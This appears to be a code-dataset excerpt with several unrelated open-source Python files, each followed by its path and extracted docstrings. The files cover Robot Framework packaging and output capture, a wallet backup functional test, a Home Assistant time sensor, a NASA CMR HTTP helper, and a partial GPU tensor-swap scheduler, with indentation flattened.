def compile_java_files(ctx, jython_jar, build_dir='build'):
root = Path('src/java/org/robotframework')
files = [str(path) for path in root.iterdir() if path.suffix == '.java']
print(f'Compiling {len(files)} Java files.')
ctx.run(f"javac -d {build_dir} -target 1.7 -source 1.7 -cp {jython_jar} "
f"{' '.join(files)}")
def unzip_jar(path, target='build'):
zipfile.ZipFile(path).extractall(target)
def copy_robot_files(build_dir='build'):
source = Path('src', 'robot')
target = Path(build_dir, 'Lib', 'robot')
shutil.copytree(str(source), str(target),
ignore=shutil.ignore_patterns('*.pyc'))
shutil.rmtree(str(Path(target, 'htmldata', 'testdata')))
def compile_python_files(ctx, jython_jar, build_dir='build'):
ctx.run(f"java -jar {jython_jar} -m compileall -x '.*3.py' {build_dir}")
# Jython will not work without its py-files, but robot will
for directory, _, files in os.walk(str(Path(build_dir, 'Lib', 'robot'))):
for name in files:
if name.endswith('.py'):
Path(directory, name).unlink()
def create_robot_jar(ctx, version, source='build'):
write_manifest(version, source)
target = Path(f'dist/robotframework-{version}.jar')
ctx.run(f'jar cvfM {target} -C {source} .')
print(f"Created '{target}'.")
def write_manifest(version, build_dir='build'):
with open(Path(build_dir, 'META-INF', 'MANIFEST.MF'), 'w') as mf:
mf.write(f'''\
Manifest-Version: 1.0
Main-Class: org.robotframework.RobotFramework
Specification-Version: 2
Implementation-Version: {version}
''')
| tasks.py | 10,074 | Initialize project by setting labels in the issue tracker.
Args:
username: GitHub username.
password: GitHub password.
Username and password can also be specified using ``GITHUB_USERNAME`` and
``GITHUB_PASSWORD`` environment variable, respectively.
Should only be executed once when taking ``rellu`` tooling to use or
when labels it uses have changed.
Create JAR distribution.
Downloads Jython JAR and PyYAML if needed.
Args:
jython_version: Jython version to use as a base. Must match version in
`jython-standalone-<version>.jar` found from Maven central.
pyyaml_version: Version of PyYAML that will be included in the
standalone jar. The version must be available from PyPI.
remove_dist: Control is 'dist' directory initially removed or not.
Generate standard library documentation.
Args:
name: Name of the library or ``all`` to generate docs for all libs.
Name is case-insensitive and can be shortened as long as it
is a unique prefix. For example, ``b`` is equivalent to
``BuiltIn`` and ``di`` equivalent to ``Dialogs``.
Print the current project version.
Generate release notes based on issues in the issue tracker.
Args:
version: Generate release notes for this version. If not given,
generated them for the current version.
username: GitHub username.
password: GitHub password.
write: When set to True, write release notes to a file overwriting
possible existing file. Otherwise just print them to the
terminal.
Username and password can also be specified using ``GITHUB_USERNAME`` and
``GITHUB_PASSWORD`` environment variable, respectively. If they aren't
specified at all, communication with GitHub is anonymous and typically
pretty slow.
Set project version in `src/robot/version.py`` file.
Args:
version: Project version to set or ``dev`` to set development version.
Following PEP-440 compatible version numbers are supported:
- Final version like 3.0 or 3.1.2.
- Alpha, beta or release candidate with ``a``, ``b`` or ``rc`` postfix,
respectively, and an incremented number like 3.0a1 or 3.0.1rc1.
- Development version with ``.dev`` postix and an incremented number like
3.0.dev1 or 3.1a1.dev2.
When the given version is ``dev``, the existing version number is updated
to the next suitable development version. For example, 3.0 -> 3.0.1.dev1,
3.1.1 -> 3.1.2.dev1, 3.2a1 -> 3.2a2.dev1, 3.2.dev1 -> 3.2.dev2.
Tasks to help Robot Framework packaging and other development.
Executed by Invoke <http://pyinvoke.org>. Install it with `pip install invoke`
and run `invoke --help` and `invoke --list` for details how to execute tasks.
See BUILD.rst for packaging and releasing instructions.
Jython will not work without its py-files, but robot will | 2,812 | en | 0.785787 |
#!/usr/bin/env python3
# Copyright (c) 2014-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet backup features.
Test case is:
4 nodes. 1 2 and 3 send transactions between each other,
fourth node is a miner.
1 2 3 each mine a block to start, then
Miner creates 100 blocks so 1 2 3 each have 50 mature
coins to spend.
Then 5 iterations of 1/2/3 sending coins amongst
themselves to get transactions in the wallets,
and the miner mining one block.
Wallets are backed up using dumpwallet/backupwallet.
Then 5 more iterations of transactions and mining a block.
Miner then generates 101 more blocks, so any
transaction fees paid mature.
Sanity check:
Sum(1,2,3,4 balances) == 114*50
1/2/3 are shutdown, and their wallets erased.
Then restore using wallet.dat backup. And
confirm 1/2/3/4 balances are same as before.
Shutdown again, restore using importwallet,
and confirm again balances are correct.
"""
from decimal import Decimal
import os
from random import randint
import shutil
from test_framework.test_framework import AgroCoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
class WalletBackupTest(AgroCoinTestFramework):
def set_test_params(self):
self.num_nodes = 4
self.setup_clean_chain = True
# nodes 1, 2,3 are spenders, let's give them a keypool=100
# whitelist all peers to speed up tx relay / mempool sync
self.extra_args = [
["-whitelist=noban@127.0.0.1", "-keypool=100"],
["-whitelist=noban@127.0.0.1", "-keypool=100"],
["-whitelist=noban@127.0.0.1", "-keypool=100"],
["-whitelist=noban@127.0.0.1"],
]
self.rpc_timeout = 120
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def setup_network(self):
self.setup_nodes()
self.connect_nodes(0, 3)
self.connect_nodes(1, 3)
self.connect_nodes(2, 3)
self.connect_nodes(2, 0)
self.sync_all()
def one_send(self, from_node, to_address):
if (randint(1,2) == 1):
amount = Decimal(randint(1,10)) / Decimal(10)
self.nodes[from_node].sendtoaddress(to_address, amount)
def do_one_round(self):
a0 = self.nodes[0].getnewaddress()
a1 = self.nodes[1].getnewaddress()
a2 = self.nodes[2].getnewaddress()
self.one_send(0, a1)
self.one_send(0, a2)
self.one_send(1, a0)
self.one_send(1, a2)
self.one_send(2, a0)
self.one_send(2, a1)
# Have the miner (node3) mine a block.
# Must sync mempools before mining.
self.sync_mempools()
self.nodes[3].generate(1)
self.sync_blocks()
# As above, this mirrors the original bash test.
def start_three(self, args=()):
self.start_node(0, self.extra_args[0] + list(args))
self.start_node(1, self.extra_args[1] + list(args))
self.start_node(2, self.extra_args[2] + list(args))
self.connect_nodes(0, 3)
self.connect_nodes(1, 3)
self.connect_nodes(2, 3)
self.connect_nodes(2, 0)
def stop_three(self):
self.stop_node(0)
self.stop_node(1)
self.stop_node(2)
def erase_three(self):
os.remove(os.path.join(self.nodes[0].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
os.remove(os.path.join(self.nodes[1].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
os.remove(os.path.join(self.nodes[2].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
def init_three(self):
self.init_wallet(0)
self.init_wallet(1)
self.init_wallet(2)
def run_test(self):
self.log.info("Generating initial blockchain")
self.nodes[0].generate(1)
self.sync_blocks()
self.nodes[1].generate(1)
self.sync_blocks()
self.nodes[2].generate(1)
self.sync_blocks()
self.nodes[3].generate(100)
self.sync_blocks()
assert_equal(self.nodes[0].getbalance(), 50)
assert_equal(self.nodes[1].getbalance(), 50)
assert_equal(self.nodes[2].getbalance(), 50)
assert_equal(self.nodes[3].getbalance(), 0)
self.log.info("Creating transactions")
# Five rounds of sending each other transactions.
for _ in range(5):
self.do_one_round()
self.log.info("Backing up")
self.nodes[0].backupwallet(os.path.join(self.nodes[0].datadir, 'wallet.bak'))
self.nodes[1].backupwallet(os.path.join(self.nodes[1].datadir, 'wallet.bak'))
self.nodes[2].backupwallet(os.path.join(self.nodes[2].datadir, 'wallet.bak'))
if not self.options.descriptors:
self.nodes[0].dumpwallet(os.path.join(self.nodes[0].datadir, 'wallet.dump'))
self.nodes[1].dumpwallet(os.path.join(self.nodes[1].datadir, 'wallet.dump'))
self.nodes[2].dumpwallet(os.path.join(self.nodes[2].datadir, 'wallet.dump'))
self.log.info("More transactions")
for _ in range(5):
self.do_one_round()
# Generate 101 more blocks, so any fees paid mature
self.nodes[3].generate(101)
self.sync_all()
balance0 = self.nodes[0].getbalance()
balance1 = self.nodes[1].getbalance()
balance2 = self.nodes[2].getbalance()
balance3 = self.nodes[3].getbalance()
total = balance0 + balance1 + balance2 + balance3
# At this point, there are 214 blocks (103 for setup, then 10 rounds, then 101.)
# 114 are mature, so the sum of all wallets should be 114 * 50 = 5700.
assert_equal(total, 5700)
##
# Test restoring spender wallets from backups
##
self.log.info("Restoring using wallet.dat")
self.stop_three()
self.erase_three()
# Start node2 with no chain
shutil.rmtree(os.path.join(self.nodes[2].datadir, self.chain, 'blocks'))
shutil.rmtree(os.path.join(self.nodes[2].datadir, self.chain, 'chainstate'))
# Restore wallets from backup
shutil.copyfile(os.path.join(self.nodes[0].datadir, 'wallet.bak'), os.path.join(self.nodes[0].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
shutil.copyfile(os.path.join(self.nodes[1].datadir, 'wallet.bak'), os.path.join(self.nodes[1].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
shutil.copyfile(os.path.join(self.nodes[2].datadir, 'wallet.bak'), os.path.join(self.nodes[2].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
self.log.info("Re-starting nodes")
self.start_three()
self.sync_blocks()
assert_equal(self.nodes[0].getbalance(), balance0)
assert_equal(self.nodes[1].getbalance(), balance1)
assert_equal(self.nodes[2].getbalance(), balance2)
if not self.options.descriptors:
self.log.info("Restoring using dumped wallet")
self.stop_three()
self.erase_three()
#start node2 with no chain
shutil.rmtree(os.path.join(self.nodes[2].datadir, self.chain, 'blocks'))
shutil.rmtree(os.path.join(self.nodes[2].datadir, self.chain, 'chainstate'))
self.start_three(["-nowallet"])
self.init_three()
assert_equal(self.nodes[0].getbalance(), 0)
assert_equal(self.nodes[1].getbalance(), 0)
assert_equal(self.nodes[2].getbalance(), 0)
self.nodes[0].importwallet(os.path.join(self.nodes[0].datadir, 'wallet.dump'))
self.nodes[1].importwallet(os.path.join(self.nodes[1].datadir, 'wallet.dump'))
self.nodes[2].importwallet(os.path.join(self.nodes[2].datadir, 'wallet.dump'))
self.sync_blocks()
assert_equal(self.nodes[0].getbalance(), balance0)
assert_equal(self.nodes[1].getbalance(), balance1)
assert_equal(self.nodes[2].getbalance(), balance2)
# Backup to source wallet file must fail
sourcePaths = [
os.path.join(self.nodes[0].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename),
os.path.join(self.nodes[0].datadir, self.chain, '.', 'wallets', self.default_wallet_name, self.wallet_data_filename),
os.path.join(self.nodes[0].datadir, self.chain, 'wallets', self.default_wallet_name),
os.path.join(self.nodes[0].datadir, self.chain, 'wallets')]
for sourcePath in sourcePaths:
assert_raises_rpc_error(-4, "backup failed", self.nodes[0].backupwallet, sourcePath)
if __name__ == '__main__':
WalletBackupTest().main()
| test/functional/wallet_backup.py | 8,945 | Test the wallet backup features.
Test case is:
4 nodes. 1 2 and 3 send transactions between each other,
fourth node is a miner.
1 2 3 each mine a block to start, then
Miner creates 100 blocks so 1 2 3 each have 50 mature
coins to spend.
Then 5 iterations of 1/2/3 sending coins amongst
themselves to get transactions in the wallets,
and the miner mining one block.
Wallets are backed up using dumpwallet/backupwallet.
Then 5 more iterations of transactions and mining a block.
Miner then generates 101 more blocks, so any
transaction fees paid mature.
Sanity check:
Sum(1,2,3,4 balances) == 114*50
1/2/3 are shutdown, and their wallets erased.
Then restore using wallet.dat backup. And
confirm 1/2/3/4 balances are same as before.
Shutdown again, restore using importwallet,
and confirm again balances are correct.
!/usr/bin/env python3 Copyright (c) 2014-2020 The Bitcoin Core developers Distributed under the MIT software license, see the accompanying file COPYING or http://www.opensource.org/licenses/mit-license.php. nodes 1, 2,3 are spenders, let's give them a keypool=100 whitelist all peers to speed up tx relay / mempool sync Have the miner (node3) mine a block. Must sync mempools before mining. As above, this mirrors the original bash test. Five rounds of sending each other transactions. Generate 101 more blocks, so any fees paid mature At this point, there are 214 blocks (103 for setup, then 10 rounds, then 101.) 114 are mature, so the sum of all wallets should be 114 * 50 = 5700. Test restoring spender wallets from backups Start node2 with no chain Restore wallets from backupstart node2 with no chain Backup to source wallet file must fail | 1,669 | en | 0.842685 |
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from robot.utils import StringIO
from robot.output import LOGGER
from robot.utils import decode_output, encode_output, JYTHON
class OutputCapturer(object):
def __init__(self, library_import=False):
self._library_import = library_import
self._python_out = PythonCapturer(stdout=True)
self._python_err = PythonCapturer(stdout=False)
self._java_out = JavaCapturer(stdout=True)
self._java_err = JavaCapturer(stdout=False)
def __enter__(self):
if self._library_import:
LOGGER.enable_library_import_logging()
return self
def __exit__(self, exc_type, exc_value, exc_trace):
self._release_and_log()
if self._library_import:
LOGGER.disable_library_import_logging()
return False
def _release_and_log(self):
stdout, stderr = self._release()
if stdout:
LOGGER.log_output(stdout)
if stderr:
LOGGER.log_output(stderr)
sys.__stderr__.write(encode_output(stderr))
def _release(self):
stdout = self._python_out.release() + self._java_out.release()
stderr = self._python_err.release() + self._java_err.release()
return stdout, stderr
class PythonCapturer(object):
def __init__(self, stdout=True):
if stdout:
self._original = sys.stdout
self._set_stream = self._set_stdout
else:
self._original = sys.stderr
self._set_stream = self._set_stderr
self._stream = StringIO()
self._set_stream(self._stream)
def _set_stdout(self, stream):
sys.stdout = stream
def _set_stderr(self, stream):
sys.stderr = stream
def release(self):
# Original stream must be restored before closing the current
self._set_stream(self._original)
try:
return self._get_value(self._stream)
finally:
self._stream.close()
self._avoid_at_exit_errors(self._stream)
def _get_value(self, stream):
try:
return decode_output(stream.getvalue())
except UnicodeError:
# Error occurs if non-ASCII chars logged both as str and unicode.
stream.buf = decode_output(stream.buf)
stream.buflist = [decode_output(item) for item in stream.buflist]
return stream.getvalue()
def _avoid_at_exit_errors(self, stream):
# Avoid ValueError at program exit when logging module tries to call
# methods of streams it has intercepted that are already closed.
# Which methods are called, and does logging silence possible errors,
# depends on Python/Jython version. For related discussion see
# http://bugs.python.org/issue6333
stream.write = lambda s: None
stream.flush = lambda: None
if not JYTHON:
class JavaCapturer(object):
def __init__(self, stdout=True):
pass
def release(self):
return u''
else:
from java.io import ByteArrayOutputStream, PrintStream
from java.lang import System
class JavaCapturer(object):
def __init__(self, stdout=True):
if stdout:
self._original = System.out
self._set_stream = System.setOut
else:
self._original = System.err
self._set_stream = System.setErr
self._bytes = ByteArrayOutputStream()
self._stream = PrintStream(self._bytes, False, 'UTF-8')
self._set_stream(self._stream)
def release(self):
# Original stream must be restored before closing the current
self._set_stream(self._original)
self._stream.close()
output = self._bytes.toString('UTF-8')
self._bytes.reset()
return output
| src/robot/running/outputcapture.py | 4,478 | Copyright 2008-2015 Nokia Solutions and Networks Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Original stream must be restored before closing the current Error occurs if non-ASCII chars logged both as str and unicode. Avoid ValueError at program exit when logging module tries to call methods of streams it has intercepted that are already closed. Which methods are called, and does logging silence possible errors, depends on Python/Jython version. For related discussion see http://bugs.python.org/issue6333 Original stream must be restored before closing the current | 1,055 | en | 0.876594 |
"""A module for useful functions.
:author: Matthew Gidden <matthew.gidden _at_ gmail.com>
"""
import numpy as np
rms = lambda a, axis=None: np.sqrt(np.mean(np.square(a), axis=axis))
| cyclopts/functionals.py | 188 | A module for useful functions.
:author: Matthew Gidden <matthew.gidden _at_ gmail.com> | 88 | en | 0.37036 |
"""
Support for showing the date and the time.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.time_date/
"""
from datetime import timedelta
import asyncio
import logging
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import CONF_DISPLAY_OPTIONS
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
import homeassistant.util.dt as dt_util
_LOGGER = logging.getLogger(__name__)
TIME_STR_FORMAT = '%H:%M'
OPTION_TYPES = {
'time': 'Time',
'date': 'Date',
'date_time': 'Date & Time',
'time_date': 'Time & Date',
'beat': 'Internet Time',
'time_utc': 'Time (UTC)',
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_DISPLAY_OPTIONS, default=['time']):
vol.All(cv.ensure_list, [vol.In(OPTION_TYPES)]),
})
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
"""Setup the Time and Date sensor."""
if hass.config.time_zone is None:
_LOGGER.error("Timezone is not set in Home Assistant configuration")
return False
devices = []
for variable in config[CONF_DISPLAY_OPTIONS]:
devices.append(TimeDateSensor(variable))
hass.loop.create_task(async_add_devices(devices, True))
return True
class TimeDateSensor(Entity):
"""Implementation of a Time and Date sensor."""
def __init__(self, option_type):
"""Initialize the sensor."""
self._name = OPTION_TYPES[option_type]
self.type = option_type
self._state = None
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def icon(self):
"""Icon to use in the frontend, if any."""
if 'date' in self.type and 'time' in self.type:
return 'mdi:calendar-clock'
elif 'date' in self.type:
return 'mdi:calendar'
else:
return 'mdi:clock'
@asyncio.coroutine
def async_update(self):
"""Get the latest data and updates the states."""
time_date = dt_util.utcnow()
time = dt_util.as_local(time_date).strftime(TIME_STR_FORMAT)
time_utc = time_date.strftime(TIME_STR_FORMAT)
date = dt_util.as_local(time_date).date().isoformat()
# Calculate Swatch Internet Time.
time_bmt = time_date + timedelta(hours=1)
delta = timedelta(
hours=time_bmt.hour, minutes=time_bmt.minute,
seconds=time_bmt.second, microseconds=time_bmt.microsecond)
beat = int((delta.seconds + delta.microseconds / 1000000.0) / 86.4)
if self.type == 'time':
self._state = time
elif self.type == 'date':
self._state = date
elif self.type == 'date_time':
self._state = '{}, {}'.format(date, time)
elif self.type == 'time_date':
self._state = '{}, {}'.format(time, date)
elif self.type == 'time_utc':
self._state = time_utc
elif self.type == 'beat':
self._state = '@{0:03d}'.format(beat)
| homeassistant/components/sensor/time_date.py | 3,314 | Implementation of a Time and Date sensor.
Initialize the sensor.
Setup the Time and Date sensor.
Get the latest data and updates the states.
Icon to use in the frontend, if any.
Return the name of the sensor.
Return the state of the sensor.
Support for showing the date and the time.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.time_date/
Calculate Swatch Internet Time. | 448 | en | 0.790251 |
# NASA EO-Metadata-Tools Python interface for the Common Metadata Repository (CMR)
#
# https://cmr.earthdata.nasa.gov/search/site/docs/search/api.html
#
# Copyright (c) 2020 United States Government as represented by the Administrator
# of the National Aeronautics and Space Administration. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
"""
date 2020-11-05
since 0.0
"""
import json
import logging
import urllib.parse
import urllib.request
import cmr.util.common as common
logging.basicConfig(level = logging.ERROR)
logger = logging.getLogger('cmr.util.network')
def get_local_ip():
"""Rewrite this stub, it is used in code not checked in yet """
return '127.0.0.1'
def value_to_param(key, value):
"""
Convert a key value pair into a URL parameter pair
"""
value = str(value)
encoded_key = urllib.parse.quote(key)
encoded_value = urllib.parse.quote(value)
result = encoded_key + "=" + encoded_value
return result
def expand_parameter_to_parameters(key, parameter):
"""
Convert a list of values into a list of URL parameters
"""
result = []
if isinstance(parameter, list):
for item in parameter:
param = value_to_param(key, item)
result.append(param)
else:
value = str(parameter)
encoded_key = urllib.parse.quote(key)
encoded_value = urllib.parse.quote(value)
result.append(encoded_key + "=" + encoded_value)
return result
def expand_query_to_parameters(query=None):
""" Convert a dictionary to URL parameters """
params = []
if query is None:
return ""
keys = sorted(query.keys())
for key in keys:
value = query[key]
params = params + expand_parameter_to_parameters(key, value)
return "&".join(params)
def apply_headers_to_request(req, headers):
"""Apply a headers to a urllib request object """
if headers is not None and req is not None:
for key in headers:
value = headers[key]
if value is not None and len(value)>0:
req.add_header(key, value)
def transform_results(results, keys_of_interest):
"""
Take a list of results and convert them to a multi valued dictionary. The
real world use case is to take values from a list of collections and pass
them to a granule search.
[{key1:value1},{key1:value2},...] -> {"key1": [value1,value2]} ->
&key1=value1&key1=value2 ( via expand_query_to_parameters() )
"""
params = {}
for item in results:
for key in keys_of_interest:
if key in item:
value = item[key]
if key in params:
params[key].append(value)
else:
params[key] = [value]
return params
def config_to_header(config, source_key, headers, destination_key=None, default=None):
"""
Copy a value in the config into a header dictionary for use by urllib. Written
to reduce boiler plate code
config[key] -> [or default] -> [rename] -> headers[key]
Parameters:
config(dictionary): where to look for values
source_key(string): name if configuration in config
headers(dictionary): where to copy values to
destination_key(string): name of key to save to in headers
default(string): value to use if value can not be found in config
"""
config = common.always(config)
if destination_key is None:
destination_key = source_key
value = config.get(source_key, default)
if destination_key is not None and value is not None:
if headers is None:
headers = {}
headers[destination_key] = value
return headers
def post(url, body, accept=None, headers=None):
"""
Make a basic HTTP call to CMR using the POST action
Parameters:
url (string): resource to get
body (dictionary): parameters to send, or string if raw text to be sent
accept (string): encoding of the returned data, some form of json is expected
client_id (string): name of the client making the (not python or curl)
headers (dictionary): HTTP headers to apply
"""
if isinstance(body, str):
#JSON string or other such text passed in"
data = body
else:
# Do not use the standard url encoder `urllib.parse.urlencode(body)` for
# the body/data because it can not handle repeating values as required
# by CMR. For example: `{'entry_title': ['2', '3']}` must become
# `entry_title=2&entry_title=3` not `entry_title=[2, 3]`
data = expand_query_to_parameters(body)
data = data.encode('utf-8')
logger.debug(" Headers->CMR= %s", headers)
logger.debug(" POST Data= %s", data)
req = urllib.request.Request(url, data)
if accept is not None:
apply_headers_to_request(req, {'Accept': accept})
apply_headers_to_request(req, headers)
try:
#pylint: disable=R1732 # the mock code does not support this in tests
resp = urllib.request.urlopen(req)
response = resp.read()
raw_response = response.decode('utf-8')
if resp.status == 200:
obj_json = json.loads(raw_response)
head_list = {}
for head in resp.getheaders():
head_list[head[0]] = head[1]
if logger.getEffectiveLevel() == logging.DEBUG:
stringified = str(common.mask_dictionary(head_list, ["cmr-token", "authorization"]))
logger.debug(" CMR->Headers = %s", stringified)
obj_json['http-headers'] = head_list
elif resp.status == 204:
obj_json = {}
head_list = {}
for head in resp.getheaders():
head_list[head[0]] = head[1]
obj_json['http-headers'] = head_list
else:
if raw_response.startswith("{") and raw_response.endswith("}"):
return json.loads(raw_response)
return raw_response
return obj_json
except urllib.error.HTTPError as exception:
raw_response = exception.read()
try:
obj_json = json.loads(raw_response)
obj_json['code'] = exception.code
obj_json['reason'] = exception.reason
return obj_json
except json.decoder.JSONDecodeError as err:
return err
return raw_response
def get(url, accept=None, headers=None):
"""
Make a basic HTTP call to CMR using the POST action
Parameters:
url (string): resource to get
body (dictionary): parameters to send, or string if raw text to be sent
accept (string): encoding of the returned data, some form of json is expected
client_id (string): name of the client making the (not python or curl)
headers (dictionary): HTTP headers to apply
"""
logger.debug(" Headers->CMR= %s", headers)
req = urllib.request.Request(url)
if accept is not None:
apply_headers_to_request(req, {'Accept': accept})
apply_headers_to_request(req, headers)
try:
#pylint: disable=R1732 # the mock code does not support this in tests
resp = urllib.request.urlopen(req)
response = resp.read()
raw_response = response.decode('utf-8')
if resp.status == 200:
obj_json = json.loads(raw_response)
if isinstance(obj_json, list):
data = obj_json
obj_json = {"hits": len(data), "items" : data}
#print (obj_json)
head_list = {}
for head in resp.getheaders():
head_list[head[0]] = head[1]
if logger.getEffectiveLevel() == logging.DEBUG:
stringified = str(common.mask_dictionary(head_list, ["cmr-token", "authorization"]))
logger.debug(" CMR->Headers = %s", stringified)
#obj_json['http-headers'] = head_list
elif resp.status == 204:
obj_json = {}
head_list = {}
for head in resp.getheaders():
head_list[head[0]] = head[1]
obj_json['http-headers'] = head_list
else:
if raw_response.startswith("{") and raw_response.endswith("}"):
return json.loads(raw_response)
return raw_response
return obj_json
except urllib.error.HTTPError as exception:
raw_response = exception.read()
try:
obj_json = json.loads(raw_response)
obj_json['code'] = exception.code
obj_json['reason'] = exception.reason
return obj_json
except json.decoder.JSONDecodeError as err:
return err
return raw_response
| CMR/python/cmr/util/network.py | 9,242 | Apply a headers to a urllib request object
Copy a value in the config into a header dictionary for use by urllib. Written
to reduce boiler plate code
config[key] -> [or default] -> [rename] -> headers[key]
Parameters:
config(dictionary): where to look for values
source_key(string): name if configuration in config
headers(dictionary): where to copy values to
destination_key(string): name of key to save to in headers
default(string): value to use if value can not be found in config
Convert a list of values into a list of URL parameters
Convert a dictionary to URL parameters
Make a basic HTTP call to CMR using the POST action
Parameters:
url (string): resource to get
body (dictionary): parameters to send, or string if raw text to be sent
accept (string): encoding of the returned data, some form of json is expected
client_id (string): name of the client making the (not python or curl)
headers (dictionary): HTTP headers to apply
Rewrite this stub, it is used in code not checked in yet
Make a basic HTTP call to CMR using the POST action
Parameters:
url (string): resource to get
body (dictionary): parameters to send, or string if raw text to be sent
accept (string): encoding of the returned data, some form of json is expected
client_id (string): name of the client making the (not python or curl)
headers (dictionary): HTTP headers to apply
Take a list of results and convert them to a multi valued dictionary. The
real world use case is to take values from a list of collections and pass
them to a granule search.
[{key1:value1},{key1:value2},...] -> {"key1": [value1,value2]} ->
&key1=value1&key1=value2 ( via expand_query_to_parameters() )
Convert a key value pair into a URL parameter pair
date 2020-11-05
since 0.0
NASA EO-Metadata-Tools Python interface for the Common Metadata Repository (CMR) https://cmr.earthdata.nasa.gov/search/site/docs/search/api.html Copyright (c) 2020 United States Government as represented by the Administrator of the National Aeronautics and Space Administration. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.JSON string or other such text passed in" Do not use the standard url encoder `urllib.parse.urlencode(body)` for the body/data because it can not handle repeating values as required by CMR. For example: `{'entry_title': ['2', '3']}` must become `entry_title=2&entry_title=3` not `entry_title=[2, 3]`pylint: disable=R1732 the mock code does not support this in testspylint: disable=R1732 the mock code does not support this in testsprint (obj_json)obj_json['http-headers'] = head_list | 3,115 | en | 0.737918 |
import copy
from enum import Enum
import multiprocessing
import numpy as np
from functools import cmp_to_key
import plotly as py
import plotly.figure_factory as ff
import plotly.graph_objects as go
from plotly.subplots import make_subplots
import plotly
from collections import defaultdict
import os
from pynvml import *
import time
import matplotlib
# matplotlib.use('Agg')
import pickle
import numpy as np
from pynvml import *
from keras.models import Sequential, load_model
from keras.layers import Dense, Conv1D, MaxPool1D, Dropout, Flatten
from matplotlib import cm
from tensorboard.plugins.hparams import keras
from line_profiler import LineProfiler
from typing import List
def get_PCIE_bandwidth():
# if not debug_mod:
# PCIE_bandwidth = nvmlDeviceGetPcieThroughput(handle, NVML_PCIE_UTIL_COUNT) # KB/s => MB/ms
# PCIE_bandwidth /= 1000000
# else:
PCIE_bandwidth = 12
return PCIE_bandwidth
GPU = int(os.environ['CUDA_VISIBLE_DEVICES'])
debug_mod = False
if not debug_mod:
nvmlInit()
handle = nvmlDeviceGetHandleByIndex(GPU)
pyplt = py.offline.plot
PCIE_bandwidth = get_PCIE_bandwidth()
load_list = ['convolution_2d_forward_VALID', 'convolution_backward_filter_2d_VALID', 'convolution_backward_data_2d_VALID',
'convolution_2d_forward_SAME', 'convolution_backward_filter_2d_SAME', 'convolution_backward_data_2d_SAME',
'dropout_forward', 'dropout_backward', 'broadcast_to_NHWC',
'broadcast_to_NCHW', 'reduce_sum_new_NHWC', 'reduce_sum_new_NCHW',
'bn_forward_pre_activation', 'bn_backward_pre_activation', 'activation_forward_relu',
'activation_backward_relu', 'activation_forward_softmax', 'activation_backward_softmax',
'pooling_2d_forward_max', 'pooling_2d_backward_max', 'pooling_2d_forward_mean',
'pooling_2d_backward_mean', 'matrix_multiply', 'matrix_elementwise_multiply_by_const', 'matrix_elementwise_add',
'array_set', 'concat_forward', 'concat_a_backward',
'concat_b_backward', 'sgd_update', 'cross', 'cross_backward', 'adam_mv', 'adam_compute']
optimizer_op = ['AdamOp']
class TaskType(Enum):
swap_out = 0
swap_in = 1
class AccessType(Enum):
output = 0
input = 1
class Tensor:
def __init__(self, tensor_id, job_id, size, shape, recomputation_time, source_tensors=None, is_parameter=False, is_input_or_output=False):
self.tensor_id = tensor_id
self.job_id = job_id
self.size = size
self.swap_time = self.size / PCIE_bandwidth
self.source_tensors = source_tensors if source_tensors is not None else []
self.recomputation_time = recomputation_time
self.recomputation_metric = self.size / self.recomputation_time
self.is_parameter = is_parameter
self.shape = shape
if self.is_parameter or is_input_or_output:
self.in_gpu_at_beginning = True
else:
self.in_gpu_at_beginning = False
def __repr__(self):
return f'tensor_id:{self.tensor_id}, job_id":{self.job_id}, size:{self.size}'
def update_swap_time(self):
PCIE_bandwidth = get_PCIE_bandwidth()
# print(f'PCIE_bandwidth:{PCIE_bandwidth}')
self.swap_time = self.size / PCIE_bandwidth
class TensorAccess:
def __init__(self, tensor, time, run_time, access_type, operation_id, operation_name):
self.tensor = tensor
self.access_id = None
